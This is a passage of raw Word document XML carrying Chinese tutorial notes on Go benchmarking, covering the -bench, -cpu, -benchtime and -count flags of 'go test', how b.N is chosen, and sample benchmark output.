      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数体写法甚至过于简单，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B999987" w14:textId="77777777" w:rsidR="00475522" w:rsidRPr="00475522" w:rsidRDefault="00475522" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475522">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func BenchmarkPrimeNumbers(b *testing.B) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3CD06" w14:textId="77777777" w:rsidR="00475522" w:rsidRPr="00475522" w:rsidRDefault="00475522" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475522">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i := 0; i &lt; b.N; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD381E" w14:textId="77777777" w:rsidR="00475522" w:rsidRPr="00475522" w:rsidRDefault="00475522" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475522">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        primeNumbers(num)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195EC80B" w14:textId="30052EF0" w:rsidR="00475522" w:rsidRPr="00475522" w:rsidRDefault="00475522" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1154"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00475522">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidR="0091306B">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5340D" w14:textId="642D0C42" w:rsidR="00475522" w:rsidRDefault="00475522" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00475522">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350BBAC" w14:textId="77777777" w:rsidR="00A84582" w:rsidRPr="00A84582" w:rsidRDefault="00A84582" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1738307A" w14:textId="77777777" w:rsidR="00A466FC" w:rsidRDefault="00A466FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A466FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-bench </w:t>
      </w:r>
      <w:r w:rsidRPr="00A466FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00A466FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>传入一个正则表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，匹配到的用例才会得到执行，例如，只运行以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fib </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结尾的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7862FF" w14:textId="418032F5" w:rsidR="00A466FC" w:rsidRDefault="00A466FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0C6041" w14:textId="177A8803" w:rsidR="00B23F0D" w:rsidRDefault="00A466FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ go test -bench='Fib$' .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D2520" w14:textId="6E2FC2B5" w:rsidR="00B23F0D" w:rsidRDefault="00B23F0D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0FC94E" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">benchmark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用例的参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b *testing.B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> b.N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用例需要运行的次数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">b.N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于每个用例都是不一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA873C" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2812D0BB" w14:textId="54798776" w:rsidR="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那这个值是如何决定的呢？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">b.N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始，如果该用例能够在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内完成，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">b.N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值便会增加，再次执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">b.N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值大概以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1, 2, 3, 5, 10, 20, 30, 50, 100 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的序列递增，越到后面，增加得越快</w:t>
      </w:r>
      <w:r w:rsidR="00286DCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为要让该函数的运行到达</w:t>
      </w:r>
      <w:r w:rsidR="00286DCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1s</w:t>
      </w:r>
      <w:r w:rsidR="00286DCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上的测试数据才有意义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。我们仔细观察上述例子的输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DAF9FD" w14:textId="73085597" w:rsidR="00B571B3" w:rsidRDefault="00961825" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定测量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB52079" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>BenchmarkFib-8               202           5980669 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7B42E" w14:textId="77777777" w:rsidR="008E4C53" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BenchmarkFib-8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GOMAXPROCS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>核数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数改变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GOMAXPROCS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-cpu </w:t>
      </w:r>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>支持传入一个列表作为参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，表示分别以多少个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来进行基准测试，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D313FE" w14:textId="77777777" w:rsidR="008E4C53" w:rsidRDefault="008E4C53" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416C66FB" w14:textId="5FC84384" w:rsidR="00A466FC" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7393EBA3" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRPr="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$ go test -bench='Fib$' -cpu=2,4 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC3BDBC" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRPr="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>goos: darwin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C528FF7" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRPr="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>goarch: amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1669D930" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRPr="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pkg: example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BDD3D6" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRPr="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkFib-2               206           5774888 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74AAF0" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRPr="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkFib-4               205           5799426 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE65C5" w14:textId="77777777" w:rsidR="00B571B3" w:rsidRPr="00B571B3" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D61017" w14:textId="05231355" w:rsidR="00A466FC" w:rsidRDefault="00B571B3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B571B3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ok      example 3.563s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3C308" w14:textId="37D77FC3" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614D2A23" w14:textId="15D04764" w:rsidR="00615590" w:rsidRDefault="00615590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidR="00474D82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对结果几乎没有影响，因为这里的</w:t>
      </w:r>
      <w:r w:rsidR="00474D82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fib</w:t>
      </w:r>
      <w:r w:rsidR="00474D82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的调用是串行的。</w:t>
      </w:r>
      <w:r w:rsidR="00933151">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00933151">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidR="00933151">
        <w:t>ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12973A5B" w14:textId="7E0399CB" w:rsidR="007B7574" w:rsidRDefault="007B7574" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">202 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5980669 ns/op</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用例执行了</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 202 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>次</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>每次花费约</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.006s</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。总耗时比</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1s </w:t>
      </w:r>
      <w:r w:rsidRPr="007B7574">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>略多。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F494EE" w14:textId="02ACD626" w:rsidR="00615590" w:rsidRDefault="00615590" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EA1013" w14:textId="77777777" w:rsidR="00961825" w:rsidRDefault="00961825" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52242A92" w14:textId="5CDFF215" w:rsidR="00961825" w:rsidRDefault="00961825" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定测量时间和次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDCE6A3" w14:textId="10F0EA84" w:rsidR="00961825" w:rsidRDefault="007D0A89" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两项是用来反复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bench</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试步骤的，主要用来提升测量准确度的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D20FB1" w14:textId="77777777" w:rsidR="00961825" w:rsidRDefault="00961825" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED39700" w14:textId="7E88E54F" w:rsidR="00EA69BE" w:rsidRDefault="00EA69BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于性能测试来说，提升测试准确度的一个重要手段就是增加测试的次数。我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -benchtime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -count </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个参数达到这个目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC3E48" w14:textId="5895E2BD" w:rsidR="00C77AE2" w:rsidRDefault="00EA69BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00331F09">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">go test -bench='Fib$' </w:t>
      </w:r>
      <w:r w:rsidRPr="00A84582">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-benchtime=5s </w:t>
      </w:r>
      <w:r w:rsidRPr="00331F09">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09285C15" w14:textId="587BC6B5" w:rsidR="00EA69BE" w:rsidRDefault="00EA69BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00331F09">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go test -bench='Fib$'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A84582">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -benchtime=50x </w:t>
      </w:r>
      <w:r w:rsidRPr="00331F09">
        <w:rPr>
